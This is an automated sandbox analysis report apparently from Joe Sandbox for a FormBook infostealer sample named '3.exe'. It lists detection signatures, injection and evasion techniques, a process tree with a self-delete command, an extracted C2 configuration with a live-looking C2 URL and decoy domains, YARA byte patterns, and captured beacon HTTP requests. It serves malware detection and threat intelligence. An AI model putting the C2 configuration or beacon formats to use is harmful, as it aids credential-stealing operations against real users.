Loading ...

Play interactive tourEdit tour

Analysis Report 3.exe

Overview

General Information

Sample Name:3.exe
Analysis ID:433178
MD5:21f077fa0e739f6174e2452abc30bb7c
SHA1:9d60988db53eb662eb6a8e2f824036348f5e7ec0
SHA256:6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3.exe (PID: 5636 cmdline: 'C:\Users\user\Desktop\3.exe' MD5: 21F077FA0E739F6174E2452ABC30BB7C)
    • 3.exe (PID: 4364 cmdline: C:\Users\user\Desktop\3.exe MD5: 21F077FA0E739F6174E2452ABC30BB7C)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 2172 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 4880 cmdline: /c del 'C:\Users\user\Desktop\3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.0.3.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.3.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.3.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        1.2.3.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.3.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 3.exeVirustotal: Detection: 58%Perma Link
          Source: 3.exeMetadefender: Detection: 42%Perma Link
          Source: 3.exeReversingLabs: Detection: 75%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.3.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 3.exe, ipconfig.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.glocp9.com/ogpo/
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1Host: www.cartercavanaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1Host: www.ayco.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1Host: www.vigipharx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1Host: www.plastictohydrogen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1Host: www.amplifierconsulting.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1Host: www.plaquitasparamascota.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 54.147.194.143 54.147.194.143
          Source: Joe Sandbox ViewIP Address: 81.17.18.198 81.17.18.198
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1Host: www.cartercavanaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1Host: www.ayco.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1Host: www.vigipharx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1Host: www.plastictohydrogen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1Host: www.amplifierconsulting.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1Host: www.plaquitasparamascota.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 10:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.3.27Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/Vary: HostData Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0
          Source: explorer.exe, 00000005.00000003.293007696.000000000F6C3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,
